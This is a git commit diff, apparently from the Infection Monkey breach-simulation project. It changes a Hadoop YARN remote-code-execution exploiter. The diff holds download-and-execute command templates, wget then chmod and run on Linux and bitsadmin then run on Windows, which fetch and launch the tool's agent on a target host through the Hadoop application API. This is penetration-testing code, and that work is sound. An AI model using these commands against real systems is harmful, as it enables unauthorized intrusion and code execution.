Final tests, windows command changed

2018-08-03 18:28:02 +03:00 · 2018-08-03 18:28:02 +03:00 · 390d94a8c3
parent c7952dcbc5
commit 390d94a8c3
2 changed files with 14 additions and 12 deletions
--- a/infection_monkey/exploit/hadoop.py
+++ b/infection_monkey/exploit/hadoop.py
@ -12,15 +12,15 @@ from exploit.web_rce import WebRCE
 from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
 import posixpath
 from threading import Lock
-from model import DROPPER_ARG, DOWNLOAD_TIMEOUT
+from model import MONKEY_ARG

 __author__ = 'VakarisZ'

 LOG = logging.getLogger(__name__)

+
 class HadoopExploiter(WebRCE):
    _TARGET_OS_TYPE = ['linux', 'windows']
-    # TODO add more hadoop ports
    HADOOP_PORTS = [["8088", False]]

    # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
@ -29,8 +29,10 @@ class HadoopExploiter(WebRCE):
                    "&& wget -O %(monkey_path)s %(http_path)s " \
                    "; chmod +x %(monkey_path)s " \
                    "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
-    WINDOWS_COMMAND = "bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s " \
-                      "&& %(monkey_path)s %(monkey_type)s %(parameters)s"
+    WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
+                      " Update /download /priority high %(http_path)s %(monkey_path)s " \
+                      "& %(monkey_path)s %(monkey_type)s %(parameters)s"
+    DOWNLOAD_TIMEOUT = 90
    LOCK = Lock()

    def __init__(self, host):
@ -64,18 +66,17 @@ class HadoopExploiter(WebRCE):
        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
        if 'linux' in self.host.os['type']:
            command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": http_path,
-                                            "monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
+                                            "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
        else:
            command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": http_path,
-                                              "monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
-        # command = "! [ -f %(monkey_path)s ] wget -O %(monkey_path)s %(http_path)s" %  {"monkey_path": path, "http_path": http_path}
+                                              "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
        if not path:
            return False

-        if not self.exploit(url, command):
+        if not self.exploit(exploitable_url, command):
            return False
        self.LOCK.release()
-        http_thread.join(DOWNLOAD_TIMEOUT)
+        http_thread.join(self.DOWNLOAD_TIMEOUT)
        http_thread.stop()
        return True

@ -102,7 +103,8 @@ class HadoopExploiter(WebRCE):
        else:
            return False

-    def try_exploit(self, url):
+    @staticmethod
+    def try_exploit(url):
        # Get the newly created application id
        try:
            resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
@ -111,4 +113,4 @@ class HadoopExploiter(WebRCE):
        if resp.status_code == 200:
            return True
        else:
-            return False
+            return False
--- a/infection_monkey/transport/http.py
+++ b/infection_monkey/transport/http.py
@ -179,7 +179,7 @@ class HTTPServer(threading.Thread):

        self._stopped = True

-    def stop(self, timeout=60):
+    def stop(self, timeout=5):
        self._stopped = True
        self.join(timeout)